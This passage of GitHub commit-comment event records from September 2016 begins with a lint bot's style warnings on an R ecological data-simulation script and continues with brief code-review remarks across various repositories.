present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/66759c0898da3ce78a587caa17ddd1e47ea8560e/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n"}},"created_at":"2016-09-21T09:57:39Z"}
{"id":"4595229823","type":"CommitCommentEvent","actor":{"login":"ochiait"},"repo":{"name":"ochiait/kadai_asagao"},"payload":{"comment":{"id":19111125,"position":null,"line":null,"path":null,"commit_id":"12aa7af71adb148713bd82832549de4adf6e4b57","created_at":"2016-09-21T09:58:11Z","updated_at":"2016-09-21T09:58:11Z","body":"@members = Member.order(\"score DESC, number\")\r\nの部分は\r\n@members = Member.order(score: :desc, number: :asc)\r\nでもOK"}},"created_at":"2016-09-21T09:58:11Z"}
{"id":"4595233717","type":"CommitCommentEvent","actor":{"login":"edarin"},"repo":{"name":"edarin/population_simulator"},"payload":{"comment":{"id":19111133,"position":16,"line":87,"path":"src/tools.py","commit_id":"d5277641f9a98b058f486fb0667daa64a8bb2a0d","created_at":"2016-09-21T09:58:55Z","updated_at":"2016-09-21T09:58:55Z","body":"tu gardes le nom de la colonne 'proba_activite' ? ou c'est à changer ?"}},"created_at":"2016-09-21T09:58:55Z"}
{"id":"4595234556","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokan-dotnet"},"payload":{"comment":{"id":19111135,"position":null,"line":null,"path":null,"commit_id":"c5f2806092b480988f80500d615de176e9d402b0","created_at":"2016-09-21T09:59:06Z","updated_at":"2016-09-21T09:59:06Z","body":"Yes it should be I clicked on github release just before commit this :cry: (release create the tag automatically)"}},"created_at":"2016-09-21T09:59:06Z"}
{"id":"4595237857","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19111141,"position":5,"line":144,"path":"src/settings/settings.cpp","commit_id":"4bea7d8ba231e15f506a9fb9a201a8eeedba6686","created_at":"2016-09-21T09:59:46Z","updated_at":"2016-09-21T09:59:46Z","body":"ok"}},"created_at":"2016-09-21T09:59:46Z"}
{"id":"4595237918","type":"CommitCommentEvent","actor":{"login":"svenefftinge"},"repo":{"name":"kthoms/xtext-core"},"payload":{"comment":{"id":19111143,"position":18,"line":115,"path":"org.eclipse.xtext.xtext.wizard/src/org/eclipse/xtext/xtext/wizard/RuntimeProjectDescriptor.xtend","commit_id":"9d17bc7443c4c85b3fdd681370cdd8e940392a7e","created_at":"2016-09-21T09:59:47Z","updated_at":"2016-09-21T09:59:47Z","body":"I would only want to have tool-specific metadata (.launch file) if I actually use that tool (eclipse)."}},"created_at":"2016-09-21T09:59:47Z"}
{"id":"4599683317","type":"CommitCommentEvent","actor":{"login":"cioan"},"repo":{"name":"PIH/openmrs-module-pihcore"},"payload":{"comment":{"id":19122937,"position":null,"line":null,"path":null,"commit_id":"546f4abe2f0fcaa33cc08f1500bb8289cb88e611","created_at":"2016-09-22T00:00:18Z","updated_at":"2016-09-22T00:00:18Z","body":"Thanks @mogoodrich . I have removed the old code from MirebalaisActivator"}},"created_at":"2016-09-22T00:00:18Z"}
{"id":"4599698133","type":"CommitCommentEvent","actor":{"login":"tianheyu927"},"repo":{"name":"tianheyu927/gps"},"payload":{"comment":{"id":19122965,"position":6,"line":195,"path":"experiments/mjc_mdgps_ioc_example/hyperparams.py","commit_id":"e0b003c25ce21b40d5934b0224dddd73d583ec21","created_at":"2016-09-22T00:04:47Z","updated_at":"2016-09-22T00:04:47Z","body":"Yes. It's just what I tried before the deadline."}},"created_at":"2016-09-22T00:04:47Z"}
{"id":"4599699695","type":"CommitCommentEvent","actor":{"login":"danstruthers"},"repo":{"name":"orientechnologies/orientdb"},"payload":{"comment":{"id":19122968,"position":5,"line":47,"path":"core/src/main/java/com/orientechnologies/orient/core/iterator/ORecordIteratorClassDescendentOrder.java","commit_id":"12747e0a142160de96694deae5312ce19958e1b2","created_at":"2016-09-22T00:05:15Z","updated_at":"2016-09-22T00:05:15Z","body":"Is there a reason you didn't just call Arrays.sort(clusterIds, Collections.reverseOrder()) here, foregoing the super call and custom reversing code?"}},"created_at":"2016-09-22T00:05:15Z"}
{"id":"4599703793","type":"CommitCommentEvent","actor":{"login":"sbstp"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19122979,"position":null,"line":null,"path":null,"commit_id":"b420f6c6ad093f6eded617c9bfb989f6316b1bd7","created_at":"2016-09-22T00:06:29Z","updated_at":"2016-09-22T00:06:29Z","body":"Does that code even work? It uses the livestreamer package that was renamed to streamlink."}},"created_at":"2016-09-22T00:06:29Z"}
{"id":"4599704950","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19122988,"position":null,"line":null,"path":null,"commit_id":"9ceeea6ef4cefd5d33da6db4f28a9f68a15cd979","created_at":"2016-09-22T00:06:52Z","updated_at":"2016-09-22T00:06:52Z","body":"revert two commits: \r\ne5e75e61c00366afedfb960715183d04e4498e27 \r\na78acae8bf4b233dd122d782200187a574987674\r\nAAC HW encoder work good."}},"created_at":"2016-09-22T00:06:52Z"}
{"id":"4599705490","type":"CommitCommentEvent","actor":{"login":"danstruthers"},"repo":{"name":"orientechnologies/orientdb"},"payload":{"comment":{"id":19122993,"position":9,"line":93,"path":"core/src/main/java/com/orientechnologies/orient/core/iterator/ORecordIteratorClass.java","commit_id":"12747e0a142160de96694deae5312ce19958e1b2","created_at":"2016-09-22T00:07:01Z","updated_at":"2016-09-22T00:07:01Z","body":"Is there a reason this was added here instead of in ORecordIteratorClusters, which is a superclass and also sorts the clusterIds array?"}},"created_at":"2016-09-22T00:07:01Z"}
{"id":"4599708742","type":"CommitCommentEvent","actor":{"login":"jtryan"},"repo":{"name":"udacity/ud845-Pets"},"payload":{"comment":{"id":19123005,"position":null,"line":null,"path":null,"commit_id":"7d0e356e7ab4d37ecb9e514ed45731367215078e","created_at":"2016-09-22T00:07:53Z","updated_at":"2016-09-22T00:07:53Z","body":"Good Review of course content 👎 "}},"created_at":"2016-09-22T00:07:53Z"}
{"id":"4599711805","type":"CommitCommentEvent","actor":{"login":"jokest16"},"repo":{"name":"jokest16/jokest16.voda.github.io"},"payload":{"comment":{"id":19123015,"position":null,"line":null,"path":null,"commit_id":"f5ec0e94921ad2863c7585545e89fa3d1e6975d7","created_at":"2016-09-22T00:08:36Z","updated_at":"2016-09-22T00:08:36Z","body":"new fav"}},"created_at":"2016-09-22T00:08:36Z"}
{"id":"4599713424","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19123021,"position":null,"line":null,"path":null,"commit_id":"9ceeea6ef4cefd5d33da6db4f28a9f68a15cd979","created_at":"2016-09-22T00:09:09Z","updated_at":"2016-09-22T00:09:09Z","body":"Please see the github message.\r\nI update the commit hash."}},"created_at":"2016-09-22T00:09:09Z"}
{"id":"4599716623","type":"CommitCommentEvent","actor":{"login":"PaulaRudy"},"repo":{"name":"PaulaRudy/FSON"},"payload":{"comment":{"id":19123031,"position":null,"line":null,"path":null,"commit_id":"0e0eb65e466971561ba25c4211e060d363ed46fe","created_at":"2016-09-22T00:10:12Z","updated_at":"2016-09-22T00:10:12Z","body":"Forgot to add: this commit unblocks issue #9."}},"created_at":"2016-09-22T00:10:12Z"}
{"id":"4599716859","type":"CommitCommentEvent","actor":{"login":"ameliavoncat"},"repo":{"name":"fryymann715/questionable_liger"},"payload":{"comment":{"id":19123032,"position":null,"line":null,"path":null,"commit_id":"4bc769c19259148754f87ebe7e2fcba706cfeb1c","created_at":"2016-09-22T00:10:15Z","updated_at":"2016-09-22T00:10:15Z","body":"not finished"}},"created_at":"2016-09-22T00:10:15Z"}
{"id":"4599717300","type":"CommitCommentEvent","actor":{"login":"danstruthers"},"repo":{"name":"orientechnologies/orientdb"},"payload":{"comment":{"id":19123033,"position":6,"line":90,"path":"core/src/main/java/com/orientechnologies/orient/core/iterator/ORecordIteratorClass.java","commit_id":"12747e0a142160de96694deae5312ce19958e1b2","created_at":"2016-09-22T00:10:23Z","updated_at":"2016-09-22T00:10:23Z","body":"I noticed that the ORecordIteratorClusters constructor (a superclass) also sorts the clusterIds array, but more concerning is the duplicate call to config, once in the superclass, and again here, the first time with the array sorted one way and possibly (in the derived class case) calling it again with the array sorted the opposite way.  Duplicate calls to config are concerning anyway.  If I am missing something or out of line, please let me know.  I am just curious as to the reasoning here.  Thanks!"}},"created_at":"2016-09-22T00:10:23Z"}
{"id":"4599718326","type":"CommitCommentEvent","actor":{"login":"moronbros"},"repo":{"name":"wwsean08/f5go"},"payload":{"comment":{"id":19123040,"position":null,"line":null,"path":null,"commit_id":"9c0f31a924b4a18cfe5bf73ce4163debdda26d7c","created_at":"2016-09-22T00:10:43Z","updated_at":"2016-09-22T00:10:43Z","body":"tempfile is a solid alternative. https://docs.python.org/2/library/tempfile.html\r\n\r\nI prefer it, mostly because it will use the temp directory of the OS the executable is running on. It can also be used pretty tightly as a context manager. shutil should be fine though."}},"created_at":"2016-09-22T00:10:43Z"}
{"id":"4599722547","type":"CommitCommentEvent","actor":{"login":"vladikoff"},"repo":{"name":"gruntjs/grunt-contrib-csslint"},"payload":{"comment":{"id":19123047,"position":null,"line":null,"path":null,"commit_id":"def72ff7293be08de49de32fdf971d87bea9b8f1","created_at":"2016-09-22T00:12:07Z","updated_at":"2016-09-22T00:12:07Z","body":"💯 💯 👍 "}},"created_at":"2016-09-22T00:12:07Z"}
{"id":"4599722579","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/nodeMySQL"},"payload":{"comment":{"id":19123048,"position":null,"line":null,"path":null,"commit_id":"c404bad506c3d7fa81b7b47d6c496515fe093fc0","created_at":"2016-09-22T00:12:07Z","updated_at":"2016-09-22T00:12:07Z","body":"[ref: for nunjucks](https://github.com/zenithtekla/node_app/blob/master/exp2014/views/p_about.html)\r\n"}},"created_at":"2016-09-22T00:12:07Z"}
{"id":"4599724750","type":"CommitCommentEvent","actor":{"login":"kevinlin1"},"repo":{"name":"Cal-CS-61A-Staff/ok"},"payload":{"comment":{"id":19123056,"position":11,"line":94,"path":"server/utils.py","commit_id":"08ff4a41774c0c9a0fbff93e83bc80574191a6b6","created_at":"2016-09-22T00:12:51Z","updated_at":"2016-09-22T00:12:51Z","body":"Yeah, we can do that here instead of using filters in the template. Another thought I had was standardizing the names on import to the database instead of running this filter on each request. Is that something we should look into?"}},"created_at":"2016-09-22T00:12:51Z"}
{"id":"4599725882","type":"CommitCommentEvent","actor":{"login":"huangleisir"},"repo":{"name":"huangleisir/captain_diary"},"payload":{"comment":{"id":19123062,"position":null,"line":null,"path":null,"commit_id":"fc31ca10bdaceea8737b1d8c92e8d7c0b1d89017","created_at":"2016-09-22T00:13:14Z","updated_at":"2016-09-22T00:13:14Z","body":"redis "}},"created_at":"2016-09-22T00:13:14Z"}
{"id":"4599726369","type":"CommitCommentEvent","actor":{"login":"moronbros"},"repo":{"name":"wwsean08/f5go"},"payload":{"comment":{"id":19123067,"position":null,"line":null,"path":null,"commit_id":"9c0f31a924b4a18cfe5bf73ce4163debdda26d7c","created_at":"2016-09-22T00:13:25Z","updated_at":"2016-09-22T00:13:25Z","body":"And if it's short term, it is probably wise to put a small comment in here as a #TODO that the save operation here is really just temporary."}},"created_at":"2016-09-22T00:13:25Z"}
{"id":"4599726683","type":"CommitCommentEvent","actor":{"login":"zbanks"},"repo":{"name":"zbanks/radiance"},"payload":{"comment":{"id":19123069,"position":null,"line":null,"path":null,"commit_id":"650351c704bf6cba99b22d0e907680823ca680f7","created_at":"2016-09-22T00:13:32Z","updated_at":"2016-09-22T00:13:32Z","body":":+1: \r\nprobably should go in the Makefile, but thanks!"}},"created_at":"2016-09-22T00:13:32Z"}
